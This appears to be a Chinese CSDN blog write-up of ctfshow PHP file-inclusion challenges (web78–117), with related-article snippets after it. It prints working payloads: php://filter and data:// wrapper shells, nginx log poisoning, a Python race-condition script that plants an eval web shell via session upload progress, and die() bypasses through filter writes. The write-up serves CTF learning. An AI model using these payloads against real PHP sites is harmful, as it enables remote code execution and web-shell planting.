ctfshow-文件包含

最新推荐文章于 2024-06-20 20:30:56 发布
最新推荐文章于 2024-06-20 20:30:56 发布
阅读量536 收藏
点赞数 3
文章标签: 服务器 运维 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74456293/article/details/129697789
版权

服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)

文件包含函数:

函数

区别

require()

在包含的过程中如果出现错误,会直接报错并退出程序的执行

include()

在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行

require_once()

和require函数相同,但只包含一次

include_once()

和include函数相同,但只包含一次

web78

先看源码

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

没有任何的过滤

方法一:

?file=php://filter/convert.base64-encode/resource=flag.php

然后base64解码即可

方法二:

?file=data://text/plain,<?php system("cat flag.php");?>

之后可以在页面的源代码里查看到flag。

data://伪协议

这里的text/plain表示的是文本

也可以text/plain;base64,若纯文字没用可用base64编码

可以参考:CTF常用伪协议总结_Asionm的博客-CSDN博客_ctf伪协议

web79

源码

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

这里把php替换成了???

可以采用上面说到的base64编码绕过

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web80

源码

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

替换了php和data

这里可以进行日志包含:通过User-Agent头部注入命令:

然后将日志包含进去,并通过POST参数执行命令:

?file=/var/log/nginx/access.log
a=system('cat fl0g.php');

仔细观察即可得到flag(查看页面源代码)

总结:

//日志包含
/?file=/var/log/nginx/access.log
//命令执行
a=system('ls');
a=system('cat fl0g.php');

web81

源码

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php,data,:

可以和上一题一样

web82

大体思路为(session文件包含):

1、post一个与ini中设置的session.upload_progress.name的同名变量(默认的name为“PHP_SESSION_UPLOAD_PROGRESS”),那么就会返回上传文件的实时进度并写入session文件中。session文件的内容为:(它会在$_SESSION中添加一组数据, 索引是session.upload_progress.prefix与 session.upload_progress.name连接在一起的值)

2、如果我们post传递PHP_SESSION_UPLOAD_PROGRESS的值为一句话木马

比如为:<?php system('ls');?>

3、同时,我们在cookie里面设置名字:PHPSESSID,值:flag,(目的是设置session文件,因为这样我们才能知道实时进度(一句话木马)上传到哪里了);那么在/tem/sess_flag这个文件的内容就为upload_progress_<?php system('ls')?>。然后在include(/tem/sess_flag)就会执行后面的php代码从而成功执行rce。

4、虽然文件上传结束后,php会清空session文件中的内容,但是如果我们边上传边去访问/tem/sess_aaa进行条件竞争,那么就有可能在删除session文件前访问到这个文件。

源码

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

在cookie处添加PHPSESSID,这样提交的话会在默认session目录下生成类似于sess_aaa的文件,默认临时目录为/tmp/sess_aaa,这个文件名字是我们可以控制的

控制里面的内容需要PHP_SESSION_UPLOAD_PRGRESS参数,是用来获取实时文件的上传进度,它会返回一个session,用来实现写入的内容

脚本

import requests
import io
import threading
 
url='http://08d4a04e-19b3-4049-8a81-e9c6226eee2f.challenge.ctf.show:8080/'
#设置PHPSESSID的值
sessionid='ctfshow'     
data={"1":"file_put_contents('/var/www/html/tao.php','<?php eval($_POST[2]);?>');"}
 
 
#为了进行条件竞争,需要一边写一边读
 
#进行上传文件时需要post传递名为PHP_SESSION_UPLOAD_PROGRESS值为一句话木马
def write(session):
    fileBytes = io.BytesIO(b'a'*1024*50)          #生产一个50k的文件
    while True:
        response=session.post(url,
            data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'},
            cookies={'PHPSESSID':sessionid},
            files={'file':('ctfshow.jpg',fileBytes)}    #设置文件名字和内容
            )
 
 
 
#读取session文件,这里文件为/tmp/sess_ctfshow
 
def read(session):
    while True:
        response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data)
        response2=session.get(url+'tao.php');
        if response2.status_code==200:
            print('++++++++++++++++++++')
        else:
            print(response2.status_code)
 
 
 
if __name__=='__main__':
 
    #开启多线程进行竞争    
    evnet=threading.Event()
    with requests.session() as session:            
        for i in range(20):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(20):
            threading.Thread(target=read,args=(session,)).start()
    evnet.set()

出现+号后然后访问url/tao.php。post传参2=system('tac fl0g.php');

web83

源码

session_unset();
session_destroy();
 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
 
    include($file);
}else{
    highlight_file(__FILE__);
}

利用session文件包含

来自:Ctfshow Web入门 - 文件包含总结 - ch0bits - 博客园

写一个POST网页

<!DOCTYPE html>
<html>
<body>
<form action="http://44a86596-324d-4eaa-8051-6e323bd0814a.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls');?>" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

创建一个1.html,写入上面的代码

搭建本地环境,进入1.html,上传的文件随意

使用bp抓包

在cookie处添加:PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag

发送到爆破模块,以上为第一个包

来到题目页面,传参?file=/tmp/sess_flag,同时抓包

发送到爆破模块。为第二个包

两个同时开始发包

访问fl0g.php即可

即可得到flag

web84-86

同上

web87

题目中的die是绕过的重点

方法1

对其使用base64解码绕过

?file=php://filter/write=convert.base64-decode/resource=flag.php

然后对content写入的内容进行base64编码

base64解码时,是4个为一组,flag.php的内容<?php die('大佬别秀了');?>中phpdie会参与base64解码,因为phpdie只有6个字节,补两个a就是8字节了

总结:我们要在content中写入shell,然后base64编码

content=<?php system('tac f*.php');?>

base64

content=PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

写入的文件内容

<?php die('大佬别秀了');?>PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

补两个a

content=aaPD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

对file进行两次url全编码

%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%36%36%25%36%43%25%36%31%25%36%37%25%32%45%25%37%30%25%36%38%25%37%30

传参

然后访问flag.php即可

方法2

使用rot13,原理和方法一类似

对content中的所有内容进行rot13编码加密,从而绕过die

<?php system('tac f*.php');?>

使用rot13编码后

<?cuc flfgrz('gnp s*.cuc');?>
?file=php://filter/write=string.rot13/resource=1.php

进行两次URL全编码

%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30

传参

然后访问1.php

web88

考察过滤后进行包含

但是这里没有过滤冒号

直接使用伪协议

?file=data://text/plain;base64,<?php system('tac *.php');?>

对<?php system('tac *.php');?>进行base64编码

PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pg==

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pg==

但是这里的=被过滤

可以在前面的基础上加一点东西

<?php system('tac *.php');?>aa

PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

web116

?file=flag.php

web117

和87类似

这里过滤了base64和rot13

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post:contents=?<hp pvela$(P_SO[T]1;)>?

访问a.php,然后传参

1=system('tac flag.php');

得到flag

踏雪寻玉
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow 文件包含 web87
Kradress的博客
12-12 1880
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
ctfshow文件上传
weixin_53955759的博客
04-15 760
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
ctfshow文件包含
SopRomeo的博客
12-17 1127
web80-81 web80 过滤了data协议,php 这题新思路,伪造UA写入php代码,然后包含日志文件来进行getshell, 当然这题还可以用大小写绕,因为str_replace区分大小写 ?file=/var/log/nginx/access.log 查flag即可 web81 web82-86 过滤了.不能通过文件包含来进行绕过 利用session.upload_progress进行文件包含 不多说了,WMCTF也做过 import io import sys import req
ctfshow文件包含web87-117
m0_62207170的博客
06-19 454
ctfshow文件包含web87-117
CTF中文件包含漏洞总结
最新发布
qq_64395221的博客
06-20 1033
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
CTFshow web入门web87-文件包含10
weixin_74336671的博客
12-01 269
把data协议也ban了,换一种方式,不直接通过当前页面进行内容的传递,使用日志包含。通过wappalyzer查看网页的banner信息,发现是nginx服务器。本题的路径是/var/log/nginx/access.log.通过抓包在UA头中插入payload,文件包含日志使代码执行。通过file读取日志,发现内容为请求行、UA头、IP地址。
文件包含(ctfshow web入门)
qq_47168481的博客
11-17 3359
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这些关卡展示了URL解析漏洞的多种利用方式,包括命令注入、数据编码绕过过滤、多语言代码执行等。防范这些攻击的关键在于对用户输入进行严格的验证和过滤,避免将不受信任的数据直接传递给解释器执行。开发者应遵循...
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
PHP特性(网友根据ctfshow整理)1
08-03
在处理文件路径时,PHP有时会允许相对路径或者伪协议(如`file://`)的使用,这可能引发安全风险,如文件包含漏洞。开发者应当谨慎处理文件路径,避免潜在的安全问题。 3. **三目运算符`?:`的理解与变量覆盖**: ...
ctfshow web入门 web87--web88&&web116--web117
2301_81040377的博客
04-04 735
content是写入内容,要进行base64编码 ,而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?整个函数调用的作用是将解码后的 $file 作为目标文件路径,然后将前面定义的终止执行提示语句与 $content 的内容拼接起来,一起写入到目标文件中。两次URL编码(浏览器(hackbar)一次,题目绕过一次)为。用php伪协议绕过但是常见的编码都被过滤这里有一种新的编码。php伪协议进行绕过(但是编码的时候必须绕过=和+)(工具用的bp的编码器,这个编码器我找了好久好久)
ctfshow学习记录-web入门(文件包含78-87
龟速更新的九某人
07-04 1631
ctfshow学习记录-web入门(文件包含web78-87
ctfshow web入门(文件包含
qq_53263789的博客
07-19 667
ctfshow
CTFshow 文件包含 78-88&116-117
Landasika的博客
05-17 1060
目录 web78web79web80方法一、http://远程包含方法二、include包含日志web81web82-86:条件竞争web87*web88web116web117 web78 if(isset($_GET['file'])){ $file=$_GET['file']; include($file); }else{ highlight_file...
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4175
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 755
文件包含之php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1036
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值